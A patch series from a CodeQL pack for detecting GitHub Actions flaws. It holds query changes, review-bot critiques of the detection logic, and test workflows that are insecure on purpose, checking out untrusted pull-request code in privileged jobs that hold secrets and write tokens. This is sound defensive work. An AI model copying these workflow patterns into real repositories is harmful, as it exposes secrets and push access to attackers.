@@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or - e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) + e.getStepId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) ) @@ -138,8 +138,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%sha%", "%commit%"]) or - e.getFieldName().matches(["%sha%", "%commit%"]) + e.getStepId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) ) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 649064e1ddd..30aa95964e1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.28 +version: 0.0.29 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d0d7e48a1b2..4c89d7804a9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.28 +version: 0.0.29 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 67c8bbc2b65..ac4761deda1 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
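Review bot: `head` now appears in both pattern lists, `["head", "branch", "ref"]` for `ActionsMutableRefCheckout` in this hunk and `["head", "sha", "commit"]` for `ActionsSHACheckout` in the next one, so a step id or output name such as `head_sha` satisfies both classes. If the two classes are meant to separate mutable refs from immutable commits, as their names suggest, a checkout pinned to a `head_sha` output would also be reported as a mutable-ref checkout. One option is to exclude SHA-like names from the mutable case, e.g. `and not e.getFieldName().matches("%sha%")`, or to keep `head` in only one list. Both `exists` blocks start outside their hunks, so how the surrounding disjuncts interact is not visible here.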
@@ -315,6 +315,8 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4fb130aa07a..c69af0316bf 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -283,7 +283,5 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6bef24d86d7..d434bd63c51 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -9,3 +9,4 @@ | .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 00000000000..b539c562084 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml new file mode 100644 index 00000000000..d8381176fd2 
--- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -0,0 +1,23 @@ +name: Test + +on: + pull_request: + +permissions: + contents: write + pull-requests: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Check out repo on head ref + uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8 + with: + ref: ${{ github.head_ref }} + token: ${{ secrets.DOCUBOT_REPO_PAT }} + + - run: | + ./cmd + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index dbbfba0a557..b048fb398a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -14,4 +14,5 @@ | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ca86bac14f0..1f90c56607d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -3,5 +3,7 @@ | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1fc45eb2969202fda4690a095dd9889746e16e88 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:33:35 +0200 Subject: [PATCH 0308/1267] Improve ControlCheck for untrusted checkouts --- .../security/UntrustedCheckoutQuery.qll | 28 ++++++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 7 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 13 ++-- .../CWE-829/UntrustedCheckoutMedium.ql | 6 +- .../CWE-829/.github/workflows/dependabot1.yml | 45 ++++++++++++ .../CWE-829/.github/workflows/dependabot2.yml | 68 +++++++++++++++++++ .../CWE-829/.github/workflows/test2.yml | 20 ++++++ .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 10 files changed, 177 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 6c3b042d1e7..ba31b0de500 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -227,7 +227,14 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { } +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} class LabelControlCheck extends ControlCheck { LabelControlCheck() { 
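Review bot: The third disjunct of `ControlCheck.dominates`, `step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this`, counts an `if:` on any single step of a needed job as guarding the checkout. A false step-level condition only skips that step; the needed job still succeeds and the dependent job runs, so the checkout is not gated and the UntrustedCheckout queries that now call `check.dominates(checkout)` would drop a real finding. I would remove that disjunct, or restrict it to cases where the dependent job's own `if:` reads an output produced by the checked step. The job-level `needs` disjunct holds only while the dependent job keeps the default status check (no `always()` or similar in its `if:`), which deserves a comment. The predicate also has no QLDoc; a line saying it holds when the check syntactically guards the step, its job or a needed job would make clear that this is not control-flow dominance.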
@@ -244,15 +251,28 @@ class LabelControlCheck extends ControlCheck { class ActorControlCheck extends ControlCheck { ActorControlCheck() { - // eg: contains(github.actor, 'dependabot') - // eg: github.triggering_actor != 'CI Agent' + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.repository\\b", + "\\bgithub\\.repository_owner\\b", ], _, _) ) } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index c1118bc00ca..ca1b855c6ec 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -2,9 +2,9 @@ * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout-toctou/high * @tags actions * security diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 0a597ee3fa4..eae580ebd52 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
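Review bot: `RepositoryControlCheck` accepts any `if:` that mentions `github.repository` or `github.repository_owner`, but on `pull_request_target` those contexts describe the base repository, so a condition like the example `github.repository == 'test/foo'` is also true for pull requests opened from forks. Such a condition stops the workflow from running inside a fork, but it does not restrict who authored the checked-out code, so treating it as a control check hides untrusted-checkout findings. Requiring the head repository in the comparison, e.g. matching `"\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b"` instead of the bare `github.repository` pattern, would keep the intended case. `ActorControlCheck` uses the same `regexpFind` style and does not inspect the operator, so a negated comparison counts as a check too; a comment stating that limitation would help.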
@@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is followed by a known poisonable step checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 29a15accdf2..9faab24dbcb 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -4,9 +4,9 @@ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout/high * @tags actions * security @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index aa62a88935b..574c2d7bffe 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -21,9 +21,9 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a non-privileged context ( inNonPrivilegedCompositeAction(checkout) or inNonPrivilegedJob(checkout) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml new file mode 100644 index 00000000000..afe1dfab038 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml 
@@ -0,0 +1,45 @@ +name: Check dist + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: # make sure the checked in dist/ folder matches the output of a rebuild + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Compare the expected and actual dist/ directories + run: script/check-diff + verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: ./ + with: + milliseconds: 1000 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml new file mode 100644 index 00000000000..072eae4b1d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml 
@@ -0,0 +1,68 @@ +name: Compile dependabot updates + +on: + pull_request: + +permissions: + pull-requests: write + contents: write +jobs: + fetch-dependabot-metadata: + runs-on: ubuntu-latest + # We only want to check the metadata on pull_request events from Dependabot itself, + # any subsequent pushes to the PR should just skip this step so we don't go into + # a loop on commits created by the `build-dependabot-changes` job + if: ${{ github.actor == 'dependabot[bot]' }} + # Map the step output to a job output for subsequent jobs + outputs: + dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }} + package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }} + steps: + - name: Fetch dependabot metadata + id: dependabot-metadata + uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0 + with: + github-token: "${{ secrets.GITHUB_TOKEN }}" + build-dependabot-changes: + runs-on: ubuntu-latest + needs: [fetch-dependabot-metadata] + # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn' + steps: + # Check out using a PAT so any pushed changes will trigger checkruns + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + token: ${{ secrets.DEPENDABOT_AUTOBUILD }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest, + # this **must** happen before rebuilding dist/ so it uses the new version of the manifest + - name: Rebuild docker/containers.json + if: 
needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' + run: | + npm run update-container-manifest + git add docker/containers.json + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Check in any change to dist/ + run: | + git add dist/ + # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560 + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0 + git push diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 00000000000..64e4992b5ca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607d..2660a726ab6 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,5 +1,7 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index a40ab1fa771..9015e85b3d0 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -15,6 +15,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From c6e3bafe00b9068d3b3b0ff1318a99b3b6b44f08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:35:06 +0200 Subject: [PATCH 0309/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30aa95964e1..2736e30331c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.29 +version: 0.0.30 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4c89d7804a9..451b49ec07e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.29 +version: 0.0.30 groups: - actions - queries 
